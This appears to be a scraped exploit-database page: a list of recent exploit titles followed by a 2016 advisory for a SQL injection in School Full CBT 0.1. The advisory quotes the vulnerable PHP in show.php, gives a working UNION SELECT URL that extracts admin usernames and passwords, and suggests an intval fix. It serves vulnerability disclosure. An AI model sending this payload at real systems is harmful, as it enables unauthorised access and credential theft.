558ab1fc67
24 new exploits Entrepreneur Job Portal Script - SQL Injection Entrepreneur Job Portal Script 2.06 - SQL Injection NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution HP Client 9.1/9.0/8.1/7.9 - Command Injection NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation Firefox 49.0.1 - Denial of Service Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation Student Information System (SIS) 0.1 - Authentication Bypass Web Based Alumni Tracking System 0.1 - SQL Injection Simple Dynamic Web 0.1 - SQL Injection Learning Management System 0.1 - Authentication Bypass Fashion Shopping Cart 0.1 - SQL Injection Health Record System 0.1 - Authentication Bypass Windows x64 - WinExec() Shellcode (93 bytes) Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation PHP Telephone Directory - Multiple Vulnerabilities Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting PHP Image Database - Multiple Vulnerabilities Simple Shopping Cart Application 0.1 - SQL Injection PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) School Full CBT 0.1 - SQL Injection PHP Business Directory - Multiple Vulnerabilities Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
45 lines
No EOL
1.3 KiB
Text
Executable file
45 lines
No EOL
1.3 KiB
Text
Executable file
# Exploit Title.............. School Full CBT SQL Injection
|
|
# Google Dork................ N/A
|
|
# Date....................... 14/10/2016
|
|
# Exploit Author............. lahilote
|
|
# Vendor Homepage............ http://www.sourcecodester.com/node/9859
|
|
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip
|
|
# Version.................... 0.1
|
|
# Tested on.................. xampp
|
|
# CVE........................ N/A
|
|
|
|
|
|
The audit_list in /show.php
|
|
-------------------------------
|
|
|
|
----snip----
|
|
|
|
$get = $_GET['show'];
|
|
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
|
|
|
|
----snip----
|
|
|
|
|
|
Example exploitation
|
|
--------------------
|
|
|
|
http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+
|
|
|
|
|
|
How to fix
|
|
----------
|
|
Simple method's use the php function intval.
|
|
For example
|
|
|
|
$get = intval($_GET['show']);
|
|
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
|
|
|
|
|
|
Credits
|
|
-------
|
|
This vulnerability was discovered and researched by lahilote
|
|
|
|
References
|
|
----------
|
|
http://www.sourcecodester.com/node/9859
|
|
http://php.net/manual/en/function.intval.php |